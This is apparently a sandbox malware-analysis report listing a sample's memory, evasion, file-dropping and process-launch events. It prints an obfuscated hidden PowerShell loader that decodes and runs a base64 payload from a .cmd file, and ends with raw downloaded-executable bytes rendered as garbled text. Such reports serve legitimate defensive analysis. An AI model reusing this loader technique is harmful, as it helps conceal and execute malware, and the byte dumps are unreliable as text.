NtProtectVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 2932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x731e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 2932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e51000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 2932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x1008f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 2932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72cf1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 2932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ce1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 2932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72cc1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 2932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x748a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7793f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x778b0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75ab1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73181000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 413696 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 3024 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 3024 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (2 events)

description	7cde3a8044.exe tried to sleep 503 seconds, actually delayed analysis time by 503 seconds
description	namez.exe tried to sleep 143 seconds, actually delayed analysis time by 143 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (6 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW April 21, 2025, 10 a.m.	number_of_free_clusters: 2425184 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 21, 2025, 10 a.m.	number_of_free_clusters: 2425184 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
DeviceIoControl April 21, 2025, 10:01 a.m.	input_buffer: control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO) device_handle: 0x000001ec output_buffer:	1	1
DeviceIoControl April 21, 2025, 10:01 a.m.	input_buffer: control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO) device_handle: 0x000001ec output_buffer:	1	1
DeviceIoControl April 21, 2025, 10:01 a.m.	input_buffer: control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO) device_handle: 0x000001ec output_buffer:	1	1
DeviceIoControl April 21, 2025, 10:01 a.m.	input_buffer: control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO) device_handle: 0x000001ec output_buffer:	1	1

Creates executable files on the filesystem (21 events)

file	C:\Users\test22\AppData\Local\Temp\10076100101\Hmcm0Oj.exe
file	C:\Windows\Temp\{3C00F4D4-05FB-4560-8F0E-1E24C5F0A8D1}\.cr\hvof1h0.exe
file	C:\Users\test22\AppData\Local\Temp\10076120101\eZp5zCz.exe
file	C:\Windows\Temp\{EF976DFB-4649-42AA-AF77-3A03FEF11467}\.ba\StlpMt45.dll
file	C:\Windows\Temp\{EF976DFB-4649-42AA-AF77-3A03FEF11467}\.ba\Entropy.dll
file	C:\Windows\Temp\{EF976DFB-4649-42AA-AF77-3A03FEF11467}\.ba\wspconfig.dll
file	C:\Users\test22\AppData\Local\Temp\10076090101\LAc2heq.exe
file	C:\Users\test22\AppData\Local\Temp\10076110101\xztOH3r.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\1w99u4.exe
file	C:\Windows\Temp\{EF976DFB-4649-42AA-AF77-3A03FEF11467}\.ba\CC3260MT.dll
file	C:\Users\test22\AppData\Local\Temp\10076170101\lBiQciH.exe
file	C:\Windows\Temp\{EF976DFB-4649-42AA-AF77-3A03FEF11467}\.ba\Install.dll
file	C:\Windows\Temp\{EF976DFB-4649-42AA-AF77-3A03FEF11467}\.ba\BorlndMm.dll
file	C:\Users\test22\AppData\Local\Temp\10076160101\235T1TS.exe
file	C:\Users\test22\AppData\Local\Temp\10076080101\7cde3a8044.exe
file	C:\Users\test22\AppData\Local\Temp\10076150101\i5Kz53x.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\2W7420.exe
file	C:\Windows\Temp\{EF976DFB-4649-42AA-AF77-3A03FEF11467}\.ba\MindClient.dll
file	C:\Users\test22\AppData\Local\Temp\10076141121\690BRuM.cmd
file	C:\Windows\Temp\{EF976DFB-4649-42AA-AF77-3A03FEF11467}\.ba\Portal-Ech64.exe
file	C:\Users\test22\AppData\Local\Temp\10076070101\hvof1h0.exe

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell (x86).lnk

Creates a suspicious process (3 events)

cmdline	PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\test22\AppData\Local\Temp\10076141121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"
cmdline	Cmd.ExE /c StARt /mIn PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\test22\AppData\Local\Temp\10076141121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"
cmdline	"C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\10076141121\690BRuM.cmd"

Drops a binary and executes it (11 events)

file	C:\Users\test22\AppData\Local\Temp\f1e82329e5\namez.exe
file	C:\Users\test22\AppData\Local\Temp\10076070101\hvof1h0.exe
file	C:\Users\test22\AppData\Local\Temp\10076080101\7cde3a8044.exe
file	C:\Users\test22\AppData\Local\Temp\10076090101\LAc2heq.exe
file	C:\Users\test22\AppData\Local\Temp\10076100101\Hmcm0Oj.exe
file	C:\Users\test22\AppData\Local\Temp\10076110101\xztOH3r.exe
file	C:\Users\test22\AppData\Local\Temp\10076120101\eZp5zCz.exe
file	C:\Users\test22\AppData\Local\Temp\10076141121\690BRuM.cmd
file	C:\Users\test22\AppData\Local\Temp\10076150101\i5Kz53x.exe
file	C:\Users\test22\AppData\Local\Temp\10076160101\235T1TS.exe
file	C:\Windows\Temp\{3C00F4D4-05FB-4560-8F0E-1E24C5F0A8D1}\.cr\hvof1h0.exe

Drops an executable to the user AppData folder (5 events)

file	C:\Users\test22\AppData\Local\Temp\10076160101\235T1TS.exe
file	C:\Users\test22\AppData\Local\Temp\10076080101\7cde3a8044.exe
file	C:\Users\test22\AppData\Local\Temp\10076070101\hvof1h0.exe
file	C:\Users\test22\AppData\Local\Temp\f1e82329e5\namez.exe
file	C:\Users\test22\AppData\Local\Temp\10076100101\Hmcm0Oj.exe

A process created a hidden window (10 events)

Time & API	Arguments	Status	Return
ShellExecuteExW April 21, 2025, 10 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\f1e82329e5\namez.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\f1e82329e5\namez.exe	1	1
ShellExecuteExW April 21, 2025, 10:01 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10076070101\hvof1h0.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10076070101\hvof1h0.exe	1	1
ShellExecuteExW April 21, 2025, 10:01 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10076080101\7cde3a8044.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10076080101\7cde3a8044.exe	1	1
ShellExecuteExW April 21, 2025, 10:01 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10076090101\LAc2heq.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10076090101\LAc2heq.exe	1	1
ShellExecuteExW April 21, 2025, 10:01 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10076100101\Hmcm0Oj.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10076100101\Hmcm0Oj.exe	1	1
ShellExecuteExW April 21, 2025, 10:01 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10076110101\xztOH3r.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10076110101\xztOH3r.exe	1	1
ShellExecuteExW April 21, 2025, 10:02 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10076120101\eZp5zCz.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10076120101\eZp5zCz.exe	1	1
ShellExecuteExW April 21, 2025, 10:02 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10076141121\690BRuM.cmd parameters: filepath: C:\Users\test22\AppData\Local\Temp\10076141121\690BRuM.cmd	1	1
ShellExecuteExW April 21, 2025, 10:02 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10076150101\i5Kz53x.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10076150101\i5Kz53x.exe	1	1
ShellExecuteExW April 21, 2025, 10:02 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10076160101\235T1TS.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10076160101\235T1TS.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (4 events)

Time & API	Arguments	Status	Return
Process32NextW April 21, 2025, 10:01 a.m.	snapshot_handle: 0x00000118 process_name: SearchFilterHost.exe process_identifier: 1960	1	1
Process32NextW April 21, 2025, 10:01 a.m.	snapshot_handle: 0x00000118 process_name: svchost.exe process_identifier: 2568	1	1
Process32NextW April 21, 2025, 10:01 a.m.	snapshot_handle: 0x00000118 process_name: sppsvc.exe process_identifier: 2668	1	1
Process32NextW April 21, 2025, 10:01 a.m.	snapshot_handle: 0x00000118 process_name: pw.exe process_identifier: 2444	1	1

An executable file was downloaded by the process namez.exe (9 events)

Time & API	Arguments	Status	Return
InternetReadFile April 21, 2025, 10:01 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $A!S@@@±Ü@±Üy@±Ü@Ü"\|@Ü"{@Ü"z#@8ü@8ì@@~PA¡#zN@¡#@@è@¡#}@Rich@PELZà t¦â°@P@´´Ð:ü=PvT¤v0p@°à4.text7 `.rdata`í°î@@.data0 @À.wixburn8À@@.rsrc:Ð<@@.relocü=>Ô@B¡°D£8¶FÃ¡°D£@¶FÃ¡ °D£X¶FÃ¡°D£D¶FÃ¡°D£H¶FÃ¡°D£<¶FÃ¡°D£L¶FÃ¡°D£P¶FÃ¡\|°D£T¶FÃ¡T³D£Ü¶FÃÌÌUìì0¡ F3ÅEüS]3ÀVuWPEÐÏÿEÔEÔPÇEØ`´DÇEÜx´DÇEà´DÇEä ´DÇEè¸´DÇEìÐ´DÇEðè´DÇEôµDÇEøµDèê"ÀxjhjjjhÿuÔÿä°DøVè@Àtèïëj EØPè[EÐPÿuVWSèl@ðÿÿtWÿà°D}ÔtÿuÔèñDöxuÐMüÆ_^3Í[èÏå]ÂUìEÀüPÿì°D]ÂUìQSVW3öVVjVuüÿð°Dh8µDÿø°DØhLµDSÿè°D=ô°DÀt hÿÐÀu9ÿ×hhµDSÿè°DÀth4µDÿÐÀuÿ×9uv}EüPÿ4·è7&F;urî_^[å]Â3ÀPPjPÿð°DÃUìQQVW3ÿEüWh\|µDP}ü}øè½ðöxbWÿuEüPèªðöxOEøPÿuüÿL³DÀu-ÿô°Dðö~·öÎöx¾@VjchµDè¤%ëHEEMøI9}ütÿuüèC_Æ^å]ÂUìQSVW}3Û3ö]ü9t1ÿ7è)ðþÿu ¸WéEüÑîPhÿÿÿÿ7èÔ Àxn]ü}ÿuEPhÿÿÿÿuèµ ÀxO}ÎG+Ë;Èsÿu;]4EVSèÀx&ë];thjjWÿuVÿ3èYë¸ÿÿ_^[å]ÂUììeüSVuW3ÿ!}ø}ô9>t,ÿ6èO(ø}ôÿÿu ¾Wéÿ6ßÿ±DÑëEøuÿu»SVèðöxt}üÿuEÿuSÿ0è! ðþzuEÿu8Mø 3ÒfOÿuÛSPè@ðöx3öFþt¶Ç}ü}ôÀt}tÈÿt ÆAïu÷Pèä%_Æ^[å]ÂUìEV=ÿÿÿr¾ë]W}À?t-3ö9utMuQVPÿ7è¡&ðöx4EëVPÿ7èh&ë jPè½$3öÀu¾Vjmh µDèw#ë_Æ^]ÂUìESV3öËÿ90tÿ0è'ð;óu¸Wë[ÑîW}ÿuÿuÿ±DøO;ÏrÙÀ%;Ïr1;ósÿuóS]Sè&ÿÿÿÀxë]hjjWÿuVÿ3è_^[]ÂUìfEj0Yf;Èw fø9wÁëjaYf;Èw føfw,Wë,7]ÂUìMEÉx3Àëÿ¸]ÂUìS]VW}WÿuSèóðöx`ÿuEPhÿÿÿÿ3èþðöxF}Wÿ3Wÿ3ÿujÿ±DÀu.ÿô°Dðö~·öÎöx¾@Vhq h µDè"_Æ^[]ÂUììE V%W}Eôt8M3öÉuÿuÿÿÿÿv¾WöxÿtEPWQèêðEë'3Àë&3öÿtÿÿÿÿv¾Wöx EPWÿuëÏ3ÀMEüöSß+ØU}ÿÿÿ]ør ¾Wé§}ôMt Éu e¹µDE 3ö©àÿÿt M¾Wë~ûw&9u 9Mñ÷Þöæ#ÆWëSÿu!uEQPSRè.UðU+]U]øöx&M ÷ÁtQûvLCÿP¶ÁPBPèáÄë3ME ©tÿtPEøPEPÿuüWQè,]øöyþzuUEÀtEÀt[_Æ^å]ÂUììE V%W}Eôt<M3ÀðÉuÿuÿÿÿÿv¾WöxÿtEPWQèUð3Àë)Ðë(3Àðÿtÿÿÿÿv¾Wöx EPWÿuëËÐMUüöSßQ+]ü}ÿÿÿU]ør¾Wë(}ôMtÉu¹4µDE÷E àÿÿðt[¾WME ©tÿtPEøPEPÿuü?PQè å]øöyþzuUEÀtEÀt[_Æ^å]Âûw}tØf9tÓMñ÷Þöæ#ÆWëÿuEEQPSRèMðU+Ù]øJUöYÿÿÿM ÷ÁtûvøvÿÿÿÀþP¶ÁPBPèßÄéZÿÿÿUìQQU ¹ÿÿÿSVÂ3ö%»WW}EøtEÀuÿu;ùvóë3öÿt;ùvóEößE]ü9Mr¾Wÿ´Æé¬}øMt Éu e¹µD3ö÷Âàÿÿt¾WÿÆë~ÿu#9u¡9ð÷Þöæ#ÆWëWÿu!uQMQWPèMðEß+Ù]üUöx,U ÷ÂtûvCÿP¶ÂPE@PèwÞEÄöy0M ÷ÁtÿtQMüQMQjWPè]üöyþzuEÀtMEÀt_Æ^[å]ÂUìQQM 3ÒSÁ»WV%òW}Eø¸ÿÿÿtUÒuÿu;øvóë ÿt;øvóUö/ßU]ü9Er¾WÿÉ3Àfé¿}øEt Àu e¸4µD3ö÷Áàÿÿt¾Wÿ3Àféÿu%9u²3Éf9§ò÷Þöæ#ÆWëeÿu3ÉPEMPWRèiMðUß+Ù]üJEöx6M ÷Át'ûv"øvÀþP¶ÁPEÀPèðÜUÄöy33ÉE © request_handle: 0x00cc000c	1	1
InternetReadFile April 21, 2025, 10:01 a.m.	buffer: MZÿÿ¸@Ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $é¶ßYØYØYØ3ÚpØYÙ[ØëÈ[ØYØVØáÞXØRichYØPELª»dà Þ´`J@JM³ @[ðoà ÐJ@à.rsrcàZ@À.idata ð^@À P)`@àrlraejgdP0öb@àepgvbkxuPJX @à.taggant0`J"\ @à request_handle: 0x00cc000c	1	1
InternetReadFile April 21, 2025, 10:01 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEdWPþgð"BdH<@@` $ ( ¸)0 Ô °Ý(Ðu@X' .textF@B `.rdata\÷`øJ@@.datax<` B @À.pdata¸) V @@.B6ûÐ `.gxfgà @@.retplne ¤ .tls ¦ @À_RDATAô ¨ @@.relocÔ 0 ª @B.jssv@ v´ @À.jssvÀv@ÀAWAVAUATVWUSHì¸H¦S H1àH$°-c 5c }ÿ¯ýû÷Óç´¯$.ÝåKPÛÑ ýõJPÛÑãþ ëÝ÷Õåâãôto ëóôtoD$ZAÀAÁþ Ãþ D$[ÀDËóD0ÀAØA À0ØDÀ½ÀçÄî¸¤{àDèl$T½ÙñDèl$P½ÒtD¸¡£l-Dèl$L½{£/Dèl$H½AÍ,¸ðÖ)Dèl$D½áD Dèl$@½$ v¯¸ÐÂ¨-Dèl$<T$8ºhñ¡fDÐT$4ºÚÛºÌ¸ZÎDÐT$(ºû ×DÐT$0AºF9ð¸&äíDDÐº-]HDÐT$,A½¼áf¸È2cGDDè¸áùA¿~ºÙ-A¼>¬ùAÁ=TÏfAùÉKÕßÉAùØñáAùáù¿AùáùÍAùgçDÈAùû ×u©D$h$9ÂD$oD$(ëAùÒtD3Aù»áf¯Aùy©zµAùÀé¢ÂDÈAùy©zLÿÿÿD$$$D$ $D$,é-ÿÿÿf.Aù¯¿J«<AùYÎxAù¤{àeDÈAùnéþÿÿHD$p¾8DÚ÷ÒâÂ @¬DØ%0 ÐÃó 5îoÏÿDÚòÓ°p¬D!Úþ÷ÖýõÓ°p¬!î!ý×÷×AÀAàòãÃ0`D Ã øçòâçp` ú1Ú÷Ð Ðó÷Óê÷ÒßçË¹ïæ4ðF þ ÓâË¹ïå4ðF Õ1õ÷Ó ëÂ÷Òâ\¶Å%£pI: ÐÚ÷Òâ\¶Åã£pI: Ó1ÃiÓéÑ[D$Ó÷ÓØ%Á½âï>B ÂÖöòËÛS<Ø÷ÐDÅõÛS<D!ÅAÈ$ê¬ÃDÇ÷×Ê¢âÇ¶æS, ÖãÇ¶% H$C Ø1ðê÷ÒDÃã÷iç@8 ßA Ðâ÷iå`ú Õ1ýA÷ÐA èÂ÷Òâ%ÛO%Ú$°w ÐDÂ÷Òâ%ÛOAàÚ$°wA ÐA1À¸Àé¢éQýÿÿAù@Í,AùïÖ)ÎAùUÏÕDÈAùÆýÿÿHD$xHø¸uõÿ*ºÊKÕßLÂE1öéûüÿÿAù¿çÄî»AùÊKÕßDÈAù&äíÑüÿÿ¸-]HéÇüÿÿAù,]HAùÒtDëDÈAùÈ2cGüÿÿH$H$H$ ¸¯ê=Þ'~)=ß'tU=~ºÙ-Ë=9Tuàé¹f.=¯ê+=M[Ø¨F=>¬ùu³H$¸ß'=Þ'¦ëÍH¼$k^ hÿ¯èè÷ÐÃãÂåÌå=t3 Ýõ<t31èèÀ=A^ ÃÚÂ0ÃAÙA0ÑÛ¸>¬ù»M[Ø¨EÃH7ÒAEÄH´$¨EÉDÃ=Þ'(ÿÿÿéLÿÿÿò] =ð] Xÿ¯ØÝ÷Õã¼@âè%CR¿ Ø5BR¿åþ ÅýÿAÁÀÿ Âÿ Ã ØD ÊÂØD ÈD0ËÃØ0Ð½ß'AEìÛ¸ß'EÅÒDÅ=Þ'¦þÿÿéÊþÿÿHy¸9TAGÇH$ =Þ'þÿÿé¤þÿÿH$¨¸9T=Þ'cþÿÿéþÿÿAù>^±æAù°¿J«%DÈAù$ v¯úÿÿD$@é¤úÿÿAùÏÂ¨-ÙAùAÍ,DÈAù¡£l-zúÿÿ$$$$$HD$`$$$$$$$$¸{£/éúÿÿAùÙñDÈAùËKùóùÿÿHcD$hHÁàHD$`HD$pHAHÂH÷ÒHÕHåüàH èH1ÂH!ÂHT$x¸gçé´ùÿÿAù¼áfDÈAùF5NqùÿÿD$HéùÿÿAùZÎxDÈAùáD qùÿÿ request_handle: 0x00cc000c	1	1
InternetReadFile April 21, 2025, 10:01 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL£hýgàtz@t@0@,¤<@°Ì¬Ø¥p.textCrt `.rdataÖx@@.data°\|@À.rsrc°Ì@Î@@.reloc¬à@BúôÃÌÌÌÌÌÌÌÌÌÌÌÌÌUSWVìL$(1ÀÉvf9MZkq<<1PE[öD1 PT1xÒD\|1\|9lí-)D$D ÈD$D$È$1Ûl$fD$Èºÿÿÿÿ1ö÷\|RvuñÒ¿\$1ÛúxÖÁî1ÛþtIÁïçþ1ÛfD·0Þ·XÁã1óÁæ1Þ·hõÁîõ·pÁæ1îÁå1õÀëÁëëÇþuÅöÂl$t·Ó·@Áà1ØÁã1ÃØÁèÃÝ1ØÂÁêÂÐÁà1ÐÂÁêÂÖÁæ1ÖðÁèð\$;D$,u ë1À;D$,t C1À9ëÿÿÿë$·XT$ÈÄ^_[]ÂÌÌÌÌÌÌÌÌÌÌÌWVPd¡0@@@ÆÇ$hðüT¡Pè6þÿÿì(`@$ÿÐÇ(p@)+F(@)+F(@) +F( @)0+F¹¶ý¯@Tý¶þ¯@Tþ¶ÿ¯@Tÿ¶°@ÁùãuÊj@h+FhàWè(ÄhrÆ²:VèýÿÿáQj@hàWÿÐøÄ^_ÃÌÌÌÌÌUSWVì´$(¬$$(°@D$(À@D$(Ð@D$((à@D$8(ð@D$H(@D$X(@D$h( @D$x(0@$(@@$(P@$¨(`@$¸(p@$È(@$Ø(@$è( @$ø1É1ÿë$f.¶DPDAùtV¶DD$ûÃÈ1Ò÷ö\ß¶Ã¶\$¶TT\öÂt°Ê)ÂöÂtÃëfó7\Aùuª¼$ ¥1ö1Û1ÉéÀÀÂÀê0Â¶úý$Èº$I÷ê)<$¿$IÊÐÁèÁêÂÕ)ÂÊ$T,¶D4¶T,ÂÈÐÿIÐâÿÿÿ)ÐÿÛIÓâÿÿÿ)Ó¶TTÀÂÐÀè0Ð¶ÀÅ)ÃÈ÷ïÊÐÁèÁúÂÕ)ÂÊÊÚÒòUÓÐëÓQÉIÑâðÈ)Ð¶ÓR¼$20ÐA9$ \$FÀIÐâÿÿÿ÷ÚÖF¶D4Ã\$¶ë¶T,T4D,.iú·mÇI·ÿÿ$v5ó¯Ýiû§7½éÇ²ÿ,d!þÿÿöÂþÿÿöT4ëfÐD4ó¯Ý¿$Ié³þÿÿÄ^_[]ÃÌÌVd¡0@@@hðüT¡Pè!úÿÿ(°@)@+F(À@)P+F(Ð@)`+F(à@)p+Fì(ð@$ÿÐÆ¸f¶Ý¼@Lý¶Þ¼@Lþ¶ß¼@Lÿ¶à¼@À=luËj@h@+FhlVèüÿÿÄè!ûÿÿÀtVÿÐ^Ã^ébùÿÿÌÌUSWVì ¡+FD$· +F¶¤+FL$öá¢È+F=,FtÆ+Ff=,FD$x'¡ä+F+ø+F£Ì+F¡Ø+F½FïL)ÅD$ë ½ÆïLÇD$ôÒ¶=è+Fø++F ,FL$ ´+FÐ+FZÿù¼IQ¾¨ÿÿEót$¿5+Ft$f£¤+F¸ÿÌ+FúüË,Áî»R=,F2fOr·=+F·Ú1ûfÇô+Fä=ì+F°+Y,F¿-À+Fíº÷ýf£+FÇÐ+Fö»T$òtüÿÿù¼IQ¸iVEÂ1Ò÷öéf1+F·À+Ff¯ø+F,F3,FØ+FÌ+FúüË,?ÿÿÿ5¨+F·=+F)þ5ð+F¶5+Föÿÿt$î»R=,F2fOÿÿÿé%ÿÿÿf¸f£+FÇÐ+FöEÿÿÿ¸£°+FÇºÓÿÿ¿ÏñfôF ´+F¿D$52;D$\|X\|$ÿ}e¶T$ú¯Ï¡à+F@£¼+F¶Â£,FÊ=Ô+F ¨+Fù·§r:éD$4ð&f£+F\|$ÿ\|¿ô+F¯Ø+F¸\$ûÓxtóÓx¡¼+F1Ò÷ó£ð+F¶T$úfÿÿÿ¡,FT$=Ô+Fzÿÿÿ ¬+F +F ¨+Fù·§r:u ð+F ä+Ff ,F¿Ê; ¸+F µh£´+FÇD$D$4% +F ß Ô+FÃi,F>\ô£,FÄ ^_[]ÃÌÌÌÌÌÌÌÌÌÌÌUSWVì ø+FùþÔu¿]f»]ë)¸M^ù +F£ü+FÇ°+F·¤+FiØTãÿÿ1ÿÇÜ+FëI¶¨+F4i¢È+F¡à+FD$9ÈL$}8f¸·f+Ø+Ff£,F¶Ô+FiÀëI$ ¬+FÉt¸FT1Ò÷ùÆëf¸þÔ$f½ô(¾þÿYAë¾¸wåª÷-¸+FÕÐÁèÁýÅ¿Í¡+FÀL$9 ì+F¹tAttEÈ·+F9ä+FrÇä+F×Èº¢+F¡+F;Ø+Ft$sG5+Fºñ0µð÷êÓóØÁèÁëÃÇ¬+F =ü+FÇD$4¡,FD$=:bt(ë^=ü+FÇD$?ÿ·gás$¡,FD$=:bu8t$0fítND$÷\|$ëH·+Fº2§Ê)Â+F¡,FD$=:btÈ¶Ô+F5U£+F¹+t request_handle: 0x00cc000c	1	1
InternetReadFile April 21, 2025, 10:01 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEdWPþgð"BdH<@@` $ ( ¸)0 Ô °Ý(Ðu@X' .textF@B `.rdata\÷`øJ@@.datax<` B @À.pdata¸) V @@.B6ûÐ `.gxfgà @@.retplne ¤ .tls ¦ @À_RDATAô ¨ @@.relocÔ 0 ª @B.jssv@ v´ @À.jssvÀv@ÀAWAVAUATVWUSHì¸H¦S H1àH$°-c 5c }ÿ¯ýû÷Óç´¯$.ÝåKPÛÑ ýõJPÛÑãþ ëÝ÷Õåâãôto ëóôtoD$ZAÀAÁþ Ãþ D$[ÀDËóD0ÀAØA À0ØDÀ½ÀçÄî¸¤{àDèl$T½ÙñDèl$P½ÒtD¸¡£l-Dèl$L½{£/Dèl$H½AÍ,¸ðÖ)Dèl$D½áD Dèl$@½$ v¯¸ÐÂ¨-Dèl$<T$8ºhñ¡fDÐT$4ºÚÛºÌ¸ZÎDÐT$(ºû ×DÐT$0AºF9ð¸&äíDDÐº-]HDÐT$,A½¼áf¸È2cGDDè¸áùA¿~ºÙ-A¼>¬ùAÁ=TÏfAùÉKÕßÉAùØñáAùáù¿AùáùÍAùgçDÈAùû ×u©D$h$9ÂD$oD$(ëAùÒtD3Aù»áf¯Aùy©zµAùÀé¢ÂDÈAùy©zLÿÿÿD$$$D$ 